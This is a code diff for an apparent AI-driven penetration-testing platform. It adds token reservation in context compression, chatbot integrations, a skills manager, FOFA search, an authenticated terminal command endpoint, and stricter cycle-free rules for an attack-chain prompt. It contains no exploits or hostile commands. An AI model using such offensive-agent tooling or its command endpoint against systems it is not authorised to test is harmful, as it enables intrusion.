@@ -738,7 +790,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
Role: "user",
Content: "这是最后一次迭代。请总结到目前为止的所有测试结果、发现的问题和已完成的工作。如果需要继续测试,请提供详细的下一步执行计划。请直接回复,不要调用工具。",
})
messages = a.applyMemoryCompression(ctx, messages)
messages = a.applyMemoryCompression(ctx, messages, 0) // 总结时不带 tools,不预留
// 立即调用OpenAI获取总结
summaryResponse, err := a.callOpenAI(ctx, messages, []Tool{}) // 不提供工具,强制AI直接回复
if err == nil && summaryResponse != nil && len(summaryResponse.Choices) > 0 {
@@ -778,7 +830,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
Role: "user",
Content: "这是最后一次迭代。请总结到目前为止的所有测试结果、发现的问题和已完成的工作。如果需要继续测试,请提供详细的下一步执行计划。请直接回复,不要调用工具。",
})
messages = a.applyMemoryCompression(ctx, messages)
messages = a.applyMemoryCompression(ctx, messages, 0) // 总结时不带 tools,不预留
// 立即调用OpenAI获取总结
summaryResponse, err := a.callOpenAI(ctx, messages, []Tool{}) // 不提供工具,强制AI直接回复
if err == nil && summaryResponse != nil && len(summaryResponse.Choices) > 0 {
@@ -817,7 +869,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
Content: fmt.Sprintf("已达到最大迭代次数(%d轮)。请总结到目前为止的所有测试结果、发现的问题和已完成的工作。如果需要继续测试,请提供详细的下一步执行计划。请直接回复,不要调用工具。", a.maxIterations),
}
messages = append(messages, finalSummaryPrompt)
messages = a.applyMemoryCompression(ctx, messages)
messages = a.applyMemoryCompression(ctx, messages, 0) // 总结时不带 tools,不预留
summaryResponse, err := a.callOpenAI(ctx, messages, []Tool{}) // 不提供工具,强制AI直接回复
if err == nil && summaryResponse != nil && len(summaryResponse.Choices) > 0 {
@@ -1375,13 +1427,13 @@ func (a *Agent) formatToolError(toolName string, args map[string]interface{}, er
return errorMsg
}
// applyMemoryCompression 在调用LLM前对消息进行压缩,避免超过token限制
func (a *Agent) applyMemoryCompression(ctx context.Context, messages []ChatMessage) []ChatMessage {
// applyMemoryCompression 在调用LLM前对消息进行压缩,避免超过 token 限制。reservedTokens 为预留给 tools 的 token 数,传 0 表示不预留。
func (a *Agent) applyMemoryCompression(ctx context.Context, messages []ChatMessage, reservedTokens int) []ChatMessage {
if a.memoryCompressor == nil {
return messages
}
compressed, changed, err := a.memoryCompressor.CompressHistory(ctx, messages)
compressed, changed, err := a.memoryCompressor.CompressHistory(ctx, messages, reservedTokens)
if err != nil {
a.logger.Warn("上下文压缩失败,将使用原始消息继续", zap.Error(err))
return messages
@@ -1397,6 +1449,18 @@ func (a *Agent) applyMemoryCompression(ctx context.Context, messages []ChatMessa
return messages
}
// countToolsTokens 统计 tools 序列化后的 token 数,用于日志与压缩时预留空间。mc 为 nil 时返回 0。
func (a *Agent) countToolsTokens(tools []Tool) int {
if len(tools) == 0 || a.memoryCompressor == nil {
return 0
}
data, err := json.Marshal(tools)
if err != nil {
return 0
}
return a.memoryCompressor.CountTextTokens(string(data))
}
// handleMissingToolError 当LLM调用不存在的工具时,向其追加提示消息并允许继续迭代
func (a *Agent) handleMissingToolError(errMsg string, messages *[]ChatMessage) (bool, string) {
lowerMsg := strings.ToLower(errMsg)
+37 -4
View File
@@ -158,8 +158,8 @@ func (mc *MemoryCompressor) UpdateConfig(cfg *config.OpenAIConfig) {
}
}
// CompressHistory 根据Token限制压缩历史消息。
func (mc *MemoryCompressor) CompressHistory(ctx context.Context, messages []ChatMessage) ([]ChatMessage, bool, error) {
// CompressHistory 根据 Token 限制压缩历史消息。reservedTokens 为预留给 tools 等非消息内容的 token 数,压缩时使用 (maxTotalTokens - reservedTokens) 作为消息上限。
func (mc *MemoryCompressor) CompressHistory(ctx context.Context, messages []ChatMessage, reservedTokens int) ([]ChatMessage, bool, error) {
if len(messages) == 0 {
return messages, false, nil
}
@@ -171,8 +171,13 @@ func (mc *MemoryCompressor) CompressHistory(ctx context.Context, messages []Chat
return messages, false, nil
}
effectiveMax := mc.maxTotalTokens
if reservedTokens > 0 && reservedTokens < mc.maxTotalTokens {
effectiveMax = mc.maxTotalTokens - reservedTokens
}
totalTokens := mc.countTotalTokens(systemMsgs, regularMsgs)
if totalTokens <= int(float64(mc.maxTotalTokens)*0.9) {
if totalTokens <= int(float64(effectiveMax)*0.9) {
return messages, false, nil
}
@@ -184,6 +189,8 @@ func (mc *MemoryCompressor) CompressHistory(ctx context.Context, messages []Chat
mc.logger.Info("memory compression triggered",
zap.Int("total_tokens", totalTokens),
zap.Int("max_total_tokens", mc.maxTotalTokens),
zap.Int("reserved_tokens", reservedTokens),
zap.Int("effective_max", effectiveMax),
zap.Int("system_messages", len(systemMsgs)),
zap.Int("regular_messages", len(regularMsgs)),
zap.Int("old_messages", len(oldMsgs)),
@@ -282,6 +289,11 @@ func (mc *MemoryCompressor) countTokens(text string) int {
return count
}
// CountTextTokens 对外暴露的文本 Token 计数,用于统计 tools 等非消息内容的 token(如 agent 侧序列化 tools 后计数)。
func (mc *MemoryCompressor) CountTextTokens(text string) int {
return mc.countTokens(text)
}
// totalTokensFor provides token statistics without mutating the message list.
func (mc *MemoryCompressor) totalTokensFor(messages []ChatMessage) (totalTokens int, systemCount int, regularCount int) {
if len(messages) == 0 {
@@ -333,8 +345,29 @@ func (mc *MemoryCompressor) adjustRecentStartForToolCalls(msgs []ChatMessage, re
adjusted--
}
// Ensure at least one user message is included in recent messages to avoid Qwen model error
// Qwen models require a user message in the message array, otherwise they return:
// "No user query found in messages"
hasUserMessage := false
for i := adjusted; i < len(msgs); i++ {
if strings.EqualFold(msgs[i].Role, "user") {
hasUserMessage = true
break
}
}
// If no user message in recent messages, adjust backwards to include one
if !hasUserMessage {
for adjusted > 0 {
adjusted--
if strings.EqualFold(msgs[adjusted].Role, "user") {
break
}
}
}
if adjusted != recentStart {
mc.logger.Debug("adjusted recent window to keep tool call context",
mc.logger.Debug("adjusted recent window to keep tool call context and user message",
zap.Int("original_recent_start", recentStart),
zap.Int("adjusted_recent_start", adjusted),
)
+222 -50
View File
@@ -7,6 +7,7 @@ import (
"net/http"
"os"
"path/filepath"
"sync"
"time"
"cyberstrike-ai/internal/agent"
@@ -14,11 +15,13 @@ import (
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/handler"
"cyberstrike-ai/internal/knowledge"
"cyberstrike-ai/internal/robot"
"cyberstrike-ai/internal/logger"
"cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/mcp/builtin"
"cyberstrike-ai/internal/openai"
"cyberstrike-ai/internal/security"
"cyberstrike-ai/internal/skills"
"cyberstrike-ai/internal/storage"
"github.com/gin-gonic/gin"
@@ -42,6 +45,10 @@ type App struct {
knowledgeIndexer *knowledge.Indexer // 知识库索引器(用于动态初始化)
knowledgeHandler *handler.KnowledgeHandler // 知识库处理器(用于动态初始化)
agentHandler *handler.AgentHandler // Agent处理器(用于更新知识库管理器)
robotHandler *handler.RobotHandler // 机器人处理器(钉钉/飞书/企业微信)
robotMu sync.Mutex // 保护钉钉/飞书长连接的 cancel
dingCancel context.CancelFunc // 钉钉 Stream 取消函数,用于配置变更时重启
larkCancel context.CancelFunc // 飞书长连接取消函数,用于配置变更时重启
}
// New 创建新应用
@@ -191,7 +198,7 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
knowledgeRetriever = knowledge.NewRetriever(knowledgeDB, embedder, retrievalConfig, log.Logger)
// 创建索引器
knowledgeIndexer = knowledge.NewIndexer(knowledgeDB, embedder, log.Logger)
knowledgeIndexer = knowledge.NewIndexer(knowledgeDB, embedder, log.Logger, &cfg.Knowledge.Indexing)
// 注册知识检索工具到MCP服务器
knowledge.RegisterKnowledgeTool(mcpServer, knowledgeRetriever, knowledgeManager, log.Logger)
@@ -215,53 +222,53 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
return
}
if hasIndex {
// 如果已有索引,只索引新添加或更新的项
if len(itemsToIndex) > 0 {
log.Logger.Info("检测到已有知识库索引,开始增量索引", zap.Int("count", len(itemsToIndex)))
ctx := context.Background()
consecutiveFailures := 0
var firstFailureItemID string
var firstFailureError error
failedCount := 0
for _, itemID := range itemsToIndex {
if err := knowledgeIndexer.IndexItem(ctx, itemID); err != nil {
failedCount++
consecutiveFailures++
if consecutiveFailures == 1 {
firstFailureItemID = itemID
firstFailureError = err
log.Logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err))
}
// 如果连续失败2次,立即停止增量索引
if consecutiveFailures >= 2 {
log.Logger.Error("连续索引失败次数过多,立即停止增量索引",
zap.Int("consecutiveFailures", consecutiveFailures),
zap.Int("totalItems", len(itemsToIndex)),
zap.String("firstFailureItemId", firstFailureItemID),
zap.Error(firstFailureError),
)
break
}
continue
if hasIndex {
// 如果已有索引,只索引新添加或更新的项
if len(itemsToIndex) > 0 {
log.Logger.Info("检测到已有知识库索引,开始增量索引", zap.Int("count", len(itemsToIndex)))
ctx := context.Background()
consecutiveFailures := 0
var firstFailureItemID string
var firstFailureError error
failedCount := 0
for _, itemID := range itemsToIndex {
if err := knowledgeIndexer.IndexItem(ctx, itemID); err != nil {
failedCount++
consecutiveFailures++
if consecutiveFailures == 1 {
firstFailureItemID = itemID
firstFailureError = err
log.Logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err))
}
// 成功时重置连续失败计数
if consecutiveFailures > 0 {
consecutiveFailures = 0
firstFailureItemID = ""
firstFailureError = nil
// 如果连续失败2次,立即停止增量索引
if consecutiveFailures >= 2 {
log.Logger.Error("连续索引失败次数过多,立即停止增量索引",
zap.Int("consecutiveFailures", consecutiveFailures),
zap.Int("totalItems", len(itemsToIndex)),
zap.String("firstFailureItemId", firstFailureItemID),
zap.Error(firstFailureError),
)
break
}
continue
}
// 成功时重置连续失败计数
if consecutiveFailures > 0 {
consecutiveFailures = 0
firstFailureItemID = ""
firstFailureError = nil
}
log.Logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)), zap.Int("failedCount", failedCount))
} else {
log.Logger.Info("检测到已有知识库索引,没有需要索引的新项或更新项")
}
return
log.Logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)), zap.Int("failedCount", failedCount))
} else {
log.Logger.Info("检测到已有知识库索引,没有需要索引的新项或更新项")
}
return
}
// 只有在没有索引时才自动重建
log.Logger.Info("未检测到知识库索引,开始自动构建索引")
@@ -278,15 +285,36 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
configPath = os.Args[1]
}
// 初始化Skills管理器
skillsDir := cfg.SkillsDir
if skillsDir == "" {
skillsDir = "skills" // 默认目录
}
// 如果是相对路径,相对于配置文件所在目录
configDir := filepath.Dir(configPath)
if !filepath.IsAbs(skillsDir) {
skillsDir = filepath.Join(configDir, skillsDir)
}
skillsManager := skills.NewManager(skillsDir, log.Logger)
log.Logger.Info("Skills管理器已初始化", zap.String("skillsDir", skillsDir))
// 注册Skills工具到MCP服务器(让AI可以按需调用,带数据库存储支持统计)
// 创建一个适配器,将database.DB适配为SkillStatsStorage接口
var skillStatsStorage skills.SkillStatsStorage
if db != nil {
skillStatsStorage = &skillStatsDBAdapter{db: db}
}
skills.RegisterSkillsToolWithStorage(mcpServer, skillsManager, skillStatsStorage, log.Logger)
// 创建处理器
agentHandler := handler.NewAgentHandler(agent, db, cfg, log.Logger)
agentHandler.SetSkillsManager(skillsManager) // 设置Skills管理器
// 如果知识库已启用,设置知识库管理器到AgentHandler以便记录检索日志
if knowledgeManager != nil {
agentHandler.SetKnowledgeManager(knowledgeManager)
}
monitorHandler := handler.NewMonitorHandler(mcpServer, executor, db, log.Logger)
monitorHandler.SetExternalMCPManager(externalMCPMgr) // 设置外部MCP管理器,以便获取外部MCP执行记录
conversationHandler := handler.NewConversationHandler(db, log.Logger)
groupHandler := handler.NewGroupHandler(db, log.Logger)
authHandler := handler.NewAuthHandler(authManager, cfg, configPath, log.Logger)
attackChainHandler := handler.NewAttackChainHandler(db, &cfg.OpenAI, log.Logger)
@@ -294,6 +322,18 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
configHandler := handler.NewConfigHandler(configPath, cfg, mcpServer, executor, agent, attackChainHandler, externalMCPMgr, log.Logger)
externalMCPHandler := handler.NewExternalMCPHandler(externalMCPMgr, cfg, configPath, log.Logger)
roleHandler := handler.NewRoleHandler(cfg, configPath, log.Logger)
roleHandler.SetSkillsManager(skillsManager) // 设置Skills管理器到RoleHandler
skillsHandler := handler.NewSkillsHandler(skillsManager, cfg, configPath, log.Logger)
fofaHandler := handler.NewFofaHandler(cfg, log.Logger)
terminalHandler := handler.NewTerminalHandler(log.Logger)
if db != nil {
skillsHandler.SetDB(db) // 设置数据库连接以便获取调用统计
}
// 创建OpenAPI处理器
conversationHandler := handler.NewConversationHandler(db, log.Logger)
robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger)
openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, resultStorage, conversationHandler, agentHandler)
// 创建 App 实例(部分字段稍后填充)
app := &App{
@@ -312,7 +352,10 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
knowledgeIndexer: knowledgeIndexer,
knowledgeHandler: knowledgeHandler,
agentHandler: agentHandler,
robotHandler: robotHandler,
}
// 飞书/钉钉长连接(无需公网),启用时在后台启动;后续前端应用配置时会通过 RestartRobotConnections 重启
app.startRobotConnections()
// 设置漏洞工具注册器(内置工具,必须设置)
vulnerabilityRegistrar := func() error {
@@ -321,6 +364,18 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
}
configHandler.SetVulnerabilityToolRegistrar(vulnerabilityRegistrar)
// 设置Skills工具注册器(内置工具,必须设置)
skillsRegistrar := func() error {
// 创建一个适配器,将database.DB适配为SkillStatsStorage接口
var skillStatsStorage skills.SkillStatsStorage
if db != nil {
skillStatsStorage = &skillStatsDBAdapter{db: db}
}
skills.RegisterSkillsToolWithStorage(mcpServer, skillsManager, skillStatsStorage, log.Logger)
return nil
}
configHandler.SetSkillsToolRegistrar(skillsRegistrar)
// 设置知识库初始化器(用于动态初始化,需要在 App 创建后设置)
configHandler.SetKnowledgeInitializer(func() (*handler.KnowledgeHandler, error) {
knowledgeHandler, err := initializeKnowledge(cfg, db, knowledgeDBConn, mcpServer, agentHandler, app, log.Logger)
@@ -357,6 +412,9 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
configHandler.SetRetrieverUpdater(knowledgeRetriever)
}
// 设置机器人连接重启器,前端应用配置后无需重启服务即可使钉钉/飞书新配置生效
configHandler.SetRobotRestarter(app)
// 设置路由(使用 App 实例以便动态获取 handler
setupRoutes(
router,
@@ -364,6 +422,7 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
agentHandler,
monitorHandler,
conversationHandler,
robotHandler,
groupHandler,
configHandler,
externalMCPHandler,
@@ -371,8 +430,12 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
app, // 传递 App 实例以便动态获取 knowledgeHandler
vulnerabilityHandler,
roleHandler,
skillsHandler,
fofaHandler,
terminalHandler,
mcpServer,
authManager,
openAPIHandler,
)
return app, nil
@@ -405,6 +468,18 @@ func (a *App) Run() error {
// Shutdown 关闭应用
func (a *App) Shutdown() {
// 停止钉钉/飞书长连接
a.robotMu.Lock()
if a.dingCancel != nil {
a.dingCancel()
a.dingCancel = nil
}
if a.larkCancel != nil {
a.larkCancel()
a.larkCancel = nil
}
a.robotMu.Unlock()
// 停止所有外部MCP客户端
if a.externalMCPMgr != nil {
a.externalMCPMgr.StopAll()
@@ -418,6 +493,40 @@ func (a *App) Shutdown() {
}
}
// startRobotConnections 根据当前配置启动钉钉/飞书长连接(不先关闭已有连接,仅用于首次启动)
func (a *App) startRobotConnections() {
a.robotMu.Lock()
defer a.robotMu.Unlock()
cfg := a.config
if cfg.Robots.Lark.Enabled && cfg.Robots.Lark.AppID != "" && cfg.Robots.Lark.AppSecret != "" {
ctx, cancel := context.WithCancel(context.Background())
a.larkCancel = cancel
go robot.StartLark(ctx, cfg.Robots.Lark, a.robotHandler, a.logger.Logger)
}
if cfg.Robots.Dingtalk.Enabled && cfg.Robots.Dingtalk.ClientID != "" && cfg.Robots.Dingtalk.ClientSecret != "" {
ctx, cancel := context.WithCancel(context.Background())
a.dingCancel = cancel
go robot.StartDing(ctx, cfg.Robots.Dingtalk, a.robotHandler, a.logger.Logger)
}
}
// RestartRobotConnections 重启钉钉/飞书长连接,使前端应用配置后立即生效(实现 handler.RobotRestarter
func (a *App) RestartRobotConnections() {
a.robotMu.Lock()
if a.dingCancel != nil {
a.dingCancel()
a.dingCancel = nil
}
if a.larkCancel != nil {
a.larkCancel()
a.larkCancel = nil
}
a.robotMu.Unlock()
// 给旧 goroutine 一点时间退出
time.Sleep(200 * time.Millisecond)
a.startRobotConnections()
}
// setupRoutes 设置路由
func setupRoutes(
router *gin.Engine,
@@ -425,6 +534,7 @@ func setupRoutes(
agentHandler *handler.AgentHandler,
monitorHandler *handler.MonitorHandler,
conversationHandler *handler.ConversationHandler,
robotHandler *handler.RobotHandler,
groupHandler *handler.GroupHandler,
configHandler *handler.ConfigHandler,
externalMCPHandler *handler.ExternalMCPHandler,
@@ -432,8 +542,12 @@ func setupRoutes(
app *App, // 传递 App 实例以便动态获取 knowledgeHandler
vulnerabilityHandler *handler.VulnerabilityHandler,
roleHandler *handler.RoleHandler,
skillsHandler *handler.SkillsHandler,
fofaHandler *handler.FofaHandler,
terminalHandler *handler.TerminalHandler,
mcpServer *mcp.Server,
authManager *security.AuthManager,
openAPIHandler *handler.OpenAPIHandler,
) {
// API路由
api := router.Group("/api")
@@ -447,9 +561,18 @@ func setupRoutes(
authRoutes.GET("/validate", security.AuthMiddleware(authManager), authHandler.Validate)
}
// 机器人回调(无需登录,供企业微信/钉钉/飞书服务器调用)
api.GET("/robot/wecom", robotHandler.HandleWecomGET)
api.POST("/robot/wecom", robotHandler.HandleWecomPOST)
api.POST("/robot/dingtalk", robotHandler.HandleDingtalkPOST)
api.POST("/robot/lark", robotHandler.HandleLarkPOST)
protected := api.Group("")
protected.Use(security.AuthMiddleware(authManager))
{
// 机器人测试(需登录):POST /api/robot/testbody: {"platform":"dingtalk","user_id":"test","text":"帮助"},用于验证机器人逻辑
protected.POST("/robot/test", robotHandler.HandleRobotTest)
// Agent Loop
protected.POST("/agent-loop", agentHandler.AgentLoop)
// Agent Loop 流式输出
@@ -459,6 +582,11 @@ func setupRoutes(
protected.GET("/agent-loop/tasks", agentHandler.ListAgentTasks)
protected.GET("/agent-loop/tasks/completed", agentHandler.ListCompletedTasks)
// 信息收集 - FOFA 查询(后端代理)
protected.POST("/fofa/search", fofaHandler.Search)
// 信息收集 - 自然语言解析为 FOFA 语法(需人工确认后再查询)
protected.POST("/fofa/parse", fofaHandler.ParseNaturalLanguage)
// 批量任务管理
protected.POST("/batch-tasks", agentHandler.CreateBatchQueue)
protected.GET("/batch-tasks", agentHandler.ListBatchQueues)
@@ -503,6 +631,11 @@ func setupRoutes(
protected.PUT("/config", configHandler.UpdateConfig)
protected.POST("/config/apply", configHandler.ApplyConfig)
// 系统设置 - 终端(执行命令,提高运维效率)
protected.POST("/terminal/run", terminalHandler.RunCommand)
protected.POST("/terminal/run/stream", terminalHandler.RunCommandStream)
protected.GET("/terminal/ws", terminalHandler.RunCommandWS)
// 外部MCP管理
protected.GET("/external-mcp", externalMCPHandler.GetExternalMCPs)
protected.GET("/external-mcp/stats", externalMCPHandler.GetExternalMCPStats)
@@ -647,6 +780,18 @@ func setupRoutes(
}
app.knowledgeHandler.Search(c)
})
knowledgeRoutes.GET("/stats", func(c *gin.Context) {
if app.knowledgeHandler == nil {
c.JSON(http.StatusOK, gin.H{
"enabled": false,
"total_categories": 0,
"total_items": 0,
"message": "知识库功能未启用,请前往系统设置启用知识检索功能",
})
return
}
app.knowledgeHandler.GetStats(c)
})
}
// 漏洞管理
@@ -660,23 +805,50 @@ func setupRoutes(
// 角色管理
protected.GET("/roles", roleHandler.GetRoles)
protected.GET("/roles/:name", roleHandler.GetRole)
protected.GET("/roles/skills/list", roleHandler.GetSkills)
protected.POST("/roles", roleHandler.CreateRole)
protected.PUT("/roles/:name", roleHandler.UpdateRole)
protected.DELETE("/roles/:name", roleHandler.DeleteRole)
// Skills管理
protected.GET("/skills", skillsHandler.GetSkills)
protected.GET("/skills/stats", skillsHandler.GetSkillStats)
protected.DELETE("/skills/stats", skillsHandler.ClearSkillStats)
protected.GET("/skills/:name", skillsHandler.GetSkill)
protected.GET("/skills/:name/bound-roles", skillsHandler.GetSkillBoundRoles)
protected.POST("/skills", skillsHandler.CreateSkill)
protected.PUT("/skills/:name", skillsHandler.UpdateSkill)
protected.DELETE("/skills/:name", skillsHandler.DeleteSkill)
protected.DELETE("/skills/:name/stats", skillsHandler.ClearSkillStatsByName)
// MCP端点
protected.POST("/mcp", func(c *gin.Context) {
mcpServer.HandleHTTP(c.Writer, c.Request)
})
// OpenAPI结果聚合端点(可选,用于获取对话的完整结果)
protected.GET("/conversations/:id/results", openAPIHandler.GetConversationResults)
}
// OpenAPI规范(需要认证,避免暴露API结构信息)
protected.GET("/openapi/spec", openAPIHandler.GetOpenAPISpec)
// API文档页面(公开访问,但需要登录后才能使用API)
router.GET("/api-docs", func(c *gin.Context) {
c.HTML(http.StatusOK, "api-docs.html", nil)
})
// 静态文件
router.Static("/static", "./web/static")
router.LoadHTMLGlob("web/templates/*")
// 前端页面
router.GET("/", func(c *gin.Context) {
c.HTML(http.StatusOK, "index.html", nil)
version := app.config.Version
if version == "" {
version = "v1.0.0"
}
c.HTML(http.StatusOK, "index.html", gin.H{"Version": version})
})
}
@@ -930,7 +1102,7 @@ func initializeKnowledge(
knowledgeRetriever := knowledge.NewRetriever(knowledgeDB, embedder, retrievalConfig, logger)
// 创建索引器
knowledgeIndexer := knowledge.NewIndexer(knowledgeDB, embedder, logger)
knowledgeIndexer := knowledge.NewIndexer(knowledgeDB, embedder, logger, &cfg.Knowledge.Indexing)
// 注册知识检索工具到MCP服务器
knowledge.RegisterKnowledgeTool(mcpServer, knowledgeRetriever, knowledgeManager, logger)
@@ -979,18 +1151,18 @@ func initializeKnowledge(
var firstFailureItemID string
var firstFailureError error
failedCount := 0
for _, itemID := range itemsToIndex {
if err := knowledgeIndexer.IndexItem(ctx, itemID); err != nil {
failedCount++
consecutiveFailures++
if consecutiveFailures == 1 {
firstFailureItemID = itemID
firstFailureError = err
logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err))
}
// 如果连续失败2次,立即停止增量索引
if consecutiveFailures >= 2 {
logger.Error("连续索引失败次数过多,立即停止增量索引",
@@ -1003,7 +1175,7 @@ func initializeKnowledge(
}
continue
}
// 成功时重置连续失败计数
if consecutiveFailures > 0 {
consecutiveFailures = 0
+40
View File
@@ -0,0 +1,40 @@
package app
import (
"time"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/skills"
)
// skillStatsDBAdapter 将database.DB适配为skills.SkillStatsStorage接口
type skillStatsDBAdapter struct {
db *database.DB
}
// UpdateSkillStats 更新Skills统计信息
func (a *skillStatsDBAdapter) UpdateSkillStats(skillName string, totalCalls, successCalls, failedCalls int, lastCallTime *time.Time) error {
return a.db.UpdateSkillStats(skillName, totalCalls, successCalls, failedCalls, lastCallTime)
}
// LoadSkillStats 加载所有Skills统计信息
func (a *skillStatsDBAdapter) LoadSkillStats() (map[string]*skills.SkillStats, error) {
dbStats, err := a.db.LoadSkillStats()
if err != nil {
return nil, err
}
// 转换为skills.SkillStats格式
result := make(map[string]*skills.SkillStats)
for name, stat := range dbStats {
result[name] = &skills.SkillStats{
SkillName: stat.SkillName,
TotalCalls: stat.TotalCalls,
SuccessCalls: stat.SuccessCalls,
FailedCalls: stat.FailedCalls,
LastCallTime: stat.LastCallTime,
}
}
return result, nil
}
+24 -15
View File
@@ -466,14 +466,21 @@ func (b *Builder) buildSimplePrompt(reactInput, modelOutput string) string {
- **权重5-7**:强关联(如发现漏洞、关键信息泄露)
- **权重8-10**:极强关联(如漏洞利用成功、权限提升)
### DAG结构要求(树状图)
- 所有边的source节点id必须小于target节点id(确保无环)
- 节点id从"node_1"开始递增
- 确保无孤立节点(每个节点至少有一条边连接
- **树状结构要求**
* 一个节点可以有多个后续节点(分支),例如:端口扫描节点可以同时连接到"Web服务识别"、"FTP服务识别"、"SSH服务识别"等多个节点
* 多个节点可以汇聚到一个节点(汇聚),例如:多个不同的测试都指向同一个漏洞节点
* 避免将所有节点连成一条线,应该根据实际的并行测试和分支探索构建树状结构
### DAG结构要求(有向无环图)
**关键:必须确保生成的是真正的DAG(有向无环图),不能有任何循环。**
- **节点编号规则**:节点id从"node_1"开始递增(node_1, node_2, node_3...
- **边的方向规则**:所有边的source节点id必须严格小于target节点idsource < target),这是确保无环的关键
* 例如:node_1 → node_2 ✓(正确)
* 例如:node_2 → node_1 ✗(错误,会形成环)
* 例如:node_3 → node_5 ✓(正确)
- **无环验证**:在输出JSON前,必须检查所有边,确保没有任何一条边的source >= target
- **无孤立节点**:确保每个节点至少有一条边连接(除了可能的根节点)
- **DAG结构特点**
* 一个节点可以有多个后续节点(分支),例如:node_2(端口扫描)可以同时连接到node_3、node_4、node_5等多个节点
* 多个节点可以汇聚到一个节点(汇聚),例如:node_3、node_4、node_5都指向node_6(漏洞节点)
* 避免将所有节点连成一条线,应该根据实际的并行测试和分支探索构建DAG结构
- **拓扑排序验证**:如果按照节点id从小到大排序,所有边都应该从左指向右(从上指向下),这样就能保证无环
## 攻击链逻辑连贯性要求
@@ -609,13 +616,15 @@ func (b *Builder) buildSimplePrompt(reactInput, modelOutput string) string {
## 重要提醒
1. **严禁杜撰**:只使用ReAct输入中实际执行的工具和实际返回的结果。如无实际数据,返回空的nodes和edges数组。
2. **树状结构优先**:必须构建树状结构,而不是线性链。一个节点可以有多个后续节点(分支),多个节点可以指向同一个节点(汇聚)。避免将所有节点连成一条线
3. **完整性优先**:必须包含所有有意义的工具执行和关键步骤,不要为了控制节点数量而删除重要节点。攻击链必须能够完整展现从目标识别到漏洞发现的完整过程
4. **逻辑连贯**:确保攻击链能够讲述一个完整、连贯的渗透测试故事,包括所有关键步骤和决策点
5. **教育价值**:优先保留有教育意义的节点,帮助学习者理解渗透测试思维和完整流程
6. **准确性**:所有节点信息必须基于实际数据,不要推测或假设
7. **完整性检查**:确保每个节点都有必要的metadata字段,每条边都有正确的source和target,没有孤立节点
8. **不要过度精简**:如果实际执行步骤较多,可以适当增加节点数量(最多20个),确保不遗漏关键步骤
2. **DAG结构必须**:必须构建真正的DAG(有向无环图),不能有任何循环。所有边的source节点id必须严格小于target节点idsource < target
3. **拓扑顺序**:节点应该按照逻辑顺序编号,target节点通常是node_1,后续的action节点按执行顺序递增,vulnerability节点在最后
4. **完整性优先**:必须包含所有有意义的工具执行和关键步骤,不要为了控制节点数量而删除重要节点。攻击链必须能够完整展现从目标识别到漏洞发现的完整过程
5. **逻辑连贯**:确保攻击链能够讲述一个完整、连贯的渗透测试故事,包括所有关键步骤和决策点
6. **教育价值**:优先保留有教育意义的节点,帮助学习者理解渗透测试思维和完整流程
7. **准确性**:所有节点信息必须基于实际数据,不要推测或假设
8. **完整性检查**:确保每个节点都有必要的metadata字段,每条边都有正确的source和target,没有孤立节点,没有循环
9. **不要过度精简**:如果实际执行步骤较多,可以适当增加节点数量(最多20个),确保不遗漏关键步骤。
10. **输出前验证**:在输出JSON前,必须验证所有边都满足source < target的条件,确保DAG结构正确。
现在开始分析并构建攻击链:`, reactInput, modelOutput)
}
+104 -29
View File
@@ -13,18 +13,54 @@ import (
)
type Config struct {
Server ServerConfig `yaml:"server"`
Log LogConfig `yaml:"log"`
MCP MCPConfig `yaml:"mcp"`
OpenAI OpenAIConfig `yaml:"openai"`
Agent AgentConfig `yaml:"agent"`
Security SecurityConfig `yaml:"security"`
Database DatabaseConfig `yaml:"database"`
Auth AuthConfig `yaml:"auth"`
ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"`
Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"`
RolesDir string `yaml:"roles_dir,omitempty" json:"roles_dir,omitempty"` // 角色配置文件目录(新方式)
Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` // 向后兼容:支持在主配置文件中定义角色
Version string `yaml:"version,omitempty" json:"version,omitempty"` // 前端显示的版本号,如 v1.3.3
Server ServerConfig `yaml:"server"`
Log LogConfig `yaml:"log"`
MCP MCPConfig `yaml:"mcp"`
OpenAI OpenAIConfig `yaml:"openai"`
FOFA FofaConfig `yaml:"fofa,omitempty" json:"fofa,omitempty"`
Agent AgentConfig `yaml:"agent"`
Security SecurityConfig `yaml:"security"`
Database DatabaseConfig `yaml:"database"`
Auth AuthConfig `yaml:"auth"`
ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"`
Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"`
Robots RobotsConfig `yaml:"robots,omitempty" json:"robots,omitempty"` // 企业微信/钉钉/飞书等机器人配置
RolesDir string `yaml:"roles_dir,omitempty" json:"roles_dir,omitempty"` // 角色配置文件目录(新方式)
Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` // 向后兼容:支持在主配置文件中定义角色
SkillsDir string `yaml:"skills_dir,omitempty" json:"skills_dir,omitempty"` // Skills配置文件目录
}
// RobotsConfig 机器人配置(企业微信、钉钉、飞书等)
type RobotsConfig struct {
Wecom RobotWecomConfig `yaml:"wecom,omitempty" json:"wecom,omitempty"` // 企业微信
